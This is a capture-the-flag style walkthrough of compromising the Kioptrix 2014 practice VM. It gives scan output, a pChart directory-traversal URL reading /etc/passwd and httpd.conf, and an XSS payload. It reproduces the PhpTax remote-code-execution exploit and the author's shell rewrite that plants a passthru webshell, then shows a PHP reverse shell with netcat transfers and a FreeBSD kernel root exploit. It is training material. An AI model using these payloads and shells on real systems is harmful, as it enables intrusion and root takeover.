# nmap -p- 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT Nmap scan report for 10.10.10.8 Host is up (0.00067s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 8080/tcp open http-proxy MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds # nmap -p22,80,8080 -sV -version-all 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT Nmap scan report for 10.10.10.8 Host is up (0.00072s latency). PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds
nmap takes so long.
Points of interest
- port80 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
- port8080 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
Details
Approach via Apache on port 80
# nikto -h 10.10.10.8 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.8 + Target Hostname: 10.10.10.8 + Target Port: 80 + Start Time: 2020-04-30 08:21:42 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 + Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current. + mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version) + Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756. 
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + 8672 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2020-04-30 08:23:20 (GMT-4) (98 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.8 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Apr 30 08:29:52 2020 URL_BASE: http://10.10.10.8/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.8/ ---- + http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210) + http://10.10.10.8/index.html (CODE:200|SIZE:152) ----------------- END_TIME: Thu Apr 30 08:30:18 2020 DOWNLOADED: 4612 - FOUND: 2
I think "CVE-2002-0082" also came up in Kioptrix 1, but does it apply here?
Apparently the Apache version doesn't match, so it doesn't.
Nothing for this Apache version, nothing for PHP either, so a dead end?
Or so I thought, but looking at the source of index.html:
<html>
<head>
<!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> -->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
"pChart2.1.3/index.php"?
Access it.
Something that looks like an admin panel appears.
# searchsploit pChart 2.1 --------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------- ---------------------------------------- pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt --------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result # cat /usr/share/exploitdb/exploits/php/webapps/31173.txt # Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS # Date: 2014-01-24 # Exploit Author: Balazs Makany # Vendor Homepage: www.pchart.net # Software Link: www.pchart.net/download # Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3" # Version: 2.1.3 # Tested on: N/A (Web Application. Tested on FreeBSD and Apache) # CVE : N/A [0] Summary: PHP library pChart 2.1.3 (and possibly previous versions) by default contains an examples folder, where the application is vulnerable to Directory Traversal and Cross-Site Scripting (XSS). It is plausible that custom built production code contains similar problems if the usage of the library was copied from the examples. The exploit author engaged the vendor before publicly disclosing the vulnerability and consequently the vendor released an official fix before the vulnerability was published. [1] Directory Traversal: "hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd" The traversal is executed with the web server's privilege and leads to sensitive file disclosure (passwd, siteconf.inc.php or similar), access to source codes, hardcoded passwords or other high impact consequences, depending on the web server's configuration. This problem may exists in the production code if the example code was copied into the production environment. Directory Traversal remediation: 1) Update to the latest version of the software. 2) Remove public access to the examples folder where applicable. 
3) Use a Web Application Firewall or similar technology to filter malicious input attempts. [2] Cross-Site Scripting (XSS): "hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script> This file uses multiple variables throughout the session, and most of them are vulnerable to XSS attacks. Certain parameters are persistent throughout the session and therefore persists until the user session is active. The parameters are unfiltered. Cross-Site Scripting remediation: 1) Update to the latest version of the software. 2) Remove public access to the examples folder where applicable. 3) Use a Web Application Firewall or similar technology to filter malicious input attempts. [3] Disclosure timeline: 2014 January 16 - Vulnerability confirmed, vendor contacted 2014 January 17 - Vendor replied, responsible disclosure was orchestrated 2014 January 24 - Vendor was inquired about progress, vendor replied and noted that the official patch is released.
There seem to be several issues, so let's try them.
Accessing "http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd" from Firefox:
# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
In Firefox I confirmed both the directory traversal above and that
http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>
fires.
I can do directory traversal, but I don't know what to look at.
Come to think of it, dirb showed a directory returning 403, so let's look at the ".htaccess" or "httpd.conf" that would hold that access control.
".htaccess" doesn't seem to exist.
"/etc/httpd/conf/httpd.conf" isn't there either?
Not in "/usr/local/apache2/conf/" either?
Then again, I remember httpd.conf living in different places depending on the OS, and this is FreeBSD, so it is probably somewhere else.
Reference for the guess: "FreeBSDでApacheのインストールと起動" (installing and starting Apache on FreeBSD) - Qiita
This is Apache 2.2.x, so my guess is "/usr/local/etc/apache22/httpd.conf".
Accessing "http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf" in Firefox:
#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk.  If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"
#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080
(snip)
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>
(snip)
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>
Include etc/apache22/Includes/*.conf
It was right there.
As expected, httpd.conf was doing the access control.
Port 8080 is also access-controlled, but only clients tagged "Mozilla4_browser" get in?
# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
phptax?
# searchsploit phptax ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit) | exploits/php/webapps/21833.rb PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution | exploits/php/webapps/25849.txt phptax 0.8 - Remote Code Execution | exploits/php/webapps/21665.txt ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
I don't want to use metasploit.
But I don't know the phptax version, so should I just try one and see?
Looking it up, though, ver 0.8 seems to be the latest version?
If so the security is wide open, and I'll bet on that.
Try the newer one, 25849.txt.
# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # Exploit Title : PhpTax File Manipulation(newvalue,field) Remote Code Execution # Date : 31 May 2013 # Exploit Author : CWH Underground # Site : www.2600.in.th # Vendor Homepage : http://phptax.sourceforge.net/ # Software Link : http://sourceforge.net/projects/phptax/ # Version : 0.8 # Tested on : Window and Linux ##################################################### #VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION ##################################################### #index.php #LINE 32: fwrite fwrite($zz, "$_GET['newvalue']"); #LINE 31: $zz = fopen("./data/$field", "w"); #LINE 2: $field = $_GET['field']; ##################################################### #DESCRIPTION ##################################################### #An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. #User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. #An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server. 
##################################################### #EXPLOIT ##################################################### <?php $options = getopt('u:'); if(!isset($options['u'])) die("\n Usage example: php exploit.php -u http://target.com/ \n"); $url = $options['u']; $shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"; $headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$url}/data/rce.php?cmd=id\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?> ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################
I thought it was only text, but it comes with a proper exploit.
So the exploit works because of problems at lines 2, 31 and 32 of "/phptax/index.php".
Just to be safe, check "usr/local/apache22//phptax/index.php".
# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php
*   Trying 10.10.10.8:8080...
* TCP_NODELAY set
* Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0)
> GET /phptax/index.php HTTP/1.1
> Host: 10.10.10.8:8080
> Accept: */*
> User-Agent:Mozilla/4.0
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Date: Fri, 01 May 2020 03:44:35 GMT
Date: Fri, 01 May 2020 03:44:35 GMT
< Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
< X-Powered-By: PHP/5.3.8
X-Powered-By: PHP/5.3.8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Content-Type: text/html
Content-Type: text/html
<
* Excess found: excess = 4131 url = /phptax/index.php (zero-length body)
* Connection #0 to host 10.10.10.8 left intact
Accessing "http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php" in Firefox. The file's location is known from "httpd.conf".
<?php
$field=$_GET[field];
(snip)
if ($_GET[newvalue]) {
    $zz=fopen("./data/$field","w");
    fwrite($zz,"$_GET[newvalue]");
    fclose($zz);
}
(snip)
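Both bugs in this box share one root cause: a request parameter is dropped into a file path without being confined to the intended directory (pChart's Script=%2f..%2f..%2fetc/passwd, and phptax's field used in fopen("./data/$field")). The following is an added example (not the projects' code) showing how each value should have been validated; the base directory, the example script name and the ".dat" suffix are assumptions. It also shows why a plain path join is not a check: an absolute user value simply replaces the base directory.

```python
"""Confine request-supplied file names to their directory. Added example,
not from the original post or either project; base paths and suffixes are
assumptions."""
import posixpath
import re
from urllib.parse import unquote


class UnsafePath(ValueError):
    """The value would escape its directory or name an unexpected file."""


def resolve_under(base_dir, user_value, allowed_suffixes):
    """Return the absolute path of user_value inside base_dir, or raise.

    The web server already URL-decodes the query string before the script
    sees it, so decode first: "%2f..%2f..%2fetc/passwd" becomes
    "/../../etc/passwd", and posixpath.join() silently discards base_dir
    when the right-hand side is absolute. The containment test afterwards
    is what actually protects the directory."""
    base = posixpath.normpath(base_dir)
    raw = unquote(user_value)
    if not raw or "\x00" in raw:
        raise UnsafePath("empty value or NUL byte")
    candidate = posixpath.normpath(posixpath.join(base, raw))
    if candidate != base and not candidate.startswith(base + "/"):
        raise UnsafePath(f"{raw!r} escapes {base}")
    if not candidate.endswith(tuple(allowed_suffixes)):
        raise UnsafePath(f"{raw!r} has a disallowed suffix")
    return candidate


# A bare data-file name: no directory part, conservative character set.
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def data_file_name(user_value, allowed_suffixes):
    """Stricter variant for a value that must be a plain file name, which is
    all phptax's 'field' ever needed to be. Writing request-controlled
    content into a web-served directory remains a bad idea even with a safe
    name; keep such data outside the document root."""
    raw = unquote(user_value)
    if posixpath.basename(raw) != raw or not NAME_RE.match(raw):
        raise UnsafePath(f"{raw!r} is not a plain file name")
    if not raw.endswith(tuple(allowed_suffixes)):
        raise UnsafePath(f"{raw!r} has a disallowed suffix")
    return raw


def rejects(fn, *args):
    """True if fn(*args) raises UnsafePath (convenience for checks)."""
    try:
        fn(*args)
    except UnsafePath:
        return True
    return False


# Assumed install path of the pChart examples on the box above.
EXAMPLES = "/usr/local/www/apache22/data/pChart2.1.3/examples"

if __name__ == "__main__":
    # "example.drawBars.php" is an assumed script name, not from the page
    print(resolve_under(EXAMPLES, "example.drawBars.php", (".php",)))
    for bad in ("%2f..%2f..%2fetc/passwd", "..%2findex.php", "sandbox/"):
        print(bad, "rejected:", rejects(resolve_under, EXAMPLES, bad, (".php",)))
    print(data_file_name("form1040.dat", (".dat",)))
    print("rce.php rejected:", rejects(data_file_name, "rce.php", (".dat",)))
```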
So, following "25849.txt", I just need to adapt the exploit code.
# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt phptax_exploit.php
When I tried to use this exploit it complained that "curl_init()" is unknown, so install it.
# php -v
PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS )
(snip)
# apt install php7.3-curl
Alright, this should work now.
# php phptax_exploit.php -u http://10.10.10.8:8080/phptax
(snip)
#####################################################
#EXPLOIT
#####################################################
 [+] Submitting request to: http://10.10.10.8:8080/phptax
 [+] Exploit was unsuccessful.
Nope. Doesn't work.
I can't make sense of it any more, so I rewrote it as a shell script.
#!/bin/sh
# ./phptax_exploit.sh
# phptax < ver 0.8 exploit
# vulncode in phptax/index.php
#   $field = $_GET['field'];               in line 2
#   $zz = fopen("./data/$field", "w");     in line 31
#   fwrite($zz, "$_GET['newvalue']");      in line 32
target_site_to_phptax_index_path="$1"   # example "http://10.10.10.8:8080/phptax"
remote_code="$2"                        # example "id"; URL-encode it! space is "%20"

# step 1: the field/newvalue bug writes rce.php into ./data/
curl -vI -H "User-Agent:Mozilla/4.0" "${target_site_to_phptax_index_path}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"
printf '\n'
# step 2: call the written file with the command
curl -H "User-Agent:Mozilla/4.0" "${target_site_to_phptax_index_path}/data/rce.php?cmd=${remote_code}"
I wrote it quickly, forgive me.
For some reason I struggled with the reverse shell from here on.
What finally worked was sending over a PHP file that does the reverse shell and executing that.
Kali ships php-reverse-shell:
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
#### change these
$VERSION = "1.0";
$ip = '10.10.10.3';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
window 1 # nc -nlvp 8080 < reverse.php
window 2 # ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&
window 1 # nc -nlvp 443
window 2 # curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php"
Finally got a shell.
$ id
uid=80(www) gid=80(www) groups=80(www)
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
Is there anything for FreeBSD 9.0?
# searchsploit FreeBSD 9.0 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | exploits/freebsd/local/28718.c FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation | exploits/freebsd/local/26368.c ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
There is one that looks just right, so I'll try 28718.c.
# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c
The compiler complained that this program had no newlines, so don't forget to add them.
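A check for exactly that, as an added example (mine, not from the write-up): before handing a source file pulled from exploit-db to gcc, report which line terminator it uses (LF, CRLF, bare CR, or none) and rewrite it with LF. It assumes only POSIX tr and wc; a file that mixes bare CR and CRLF lines is treated as CRLF. The sample files in the usage are constructed, not the real 28718.c.

```shell
#!/bin/sh
# eol.sh (added example, not from the write-up): normalise line endings
# of a downloaded exploit source before compiling it.

# Print LF, CRLF, CR or NONE for the file named in $1, based on which
# terminator bytes it actually contains.
eol_style() {
    cr=$(tr -cd '\r' < "$1" | wc -c | tr -d ' ')
    lf=$(tr -cd '\n' < "$1" | wc -c | tr -d ' ')
    if [ "$cr" -gt 0 ] && [ "$lf" -eq 0 ]; then
        echo CR
    elif [ "$cr" -gt 0 ]; then
        echo CRLF        # mixed CR/CRLF files land here too
    elif [ "$lf" -gt 0 ]; then
        echo LF
    else
        echo NONE        # single line with no terminator at all
    fi
}

# Rewrite $1 in place with LF line endings, whatever it had before.
to_lf() {
    tmp="$1.lf.$$"
    case "$(eol_style "$1")" in
        CR)   tr '\r' '\n' < "$1" > "$tmp" ;;   # each lone CR becomes LF
        CRLF) tr -d '\r'   < "$1" > "$tmp" ;;   # drop the CR of every CRLF
        *)    cat "$1" > "$tmp" ;;              # already LF (or nothing to do)
    esac
    mv "$tmp" "$1"
}

# Usage: sh eol.sh priv.c  -> normalises priv.c and reports before/after.
if [ $# -eq 1 ]; then
    echo "before: $(eol_style "$1")"
    to_lf "$1"
    echo "after:  $(eol_style "$1"), $(wc -l < "$1" | tr -d ' ') lines"
fi
```

Run it on the victim (or on the attacker before the nc transfer) so that `wc -l` on the file matches what you see in the exploit-db listing; a count of 0 or 1 means the compiler is about to see one very long line.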
victim
$ wget http://10.10.10.3/freebsd9.0_priv.c
wget: not found

Seriously?
Guess I'll transfer the file with nc again.

attacker
# nc -nlvp 8080 < freebsd9.0_priv.c
victim
$ cd /tmp
$ nc 10.10.10.3 8080 > priv.c
$ gcc priv.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$ cd /root
$ ls
.cshrc .history .k5login .login .mysql_history .profile congrats.txt folderMonitor.log httpd-access.log lazyClearLog.sh monitor.py ossec-alerts.log
$ cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this.
The httpd-access.log is rather self-explanatory.
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself.

Be good...

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :)
Got it!
The end.
Is it normal for exploit code to come without newlines?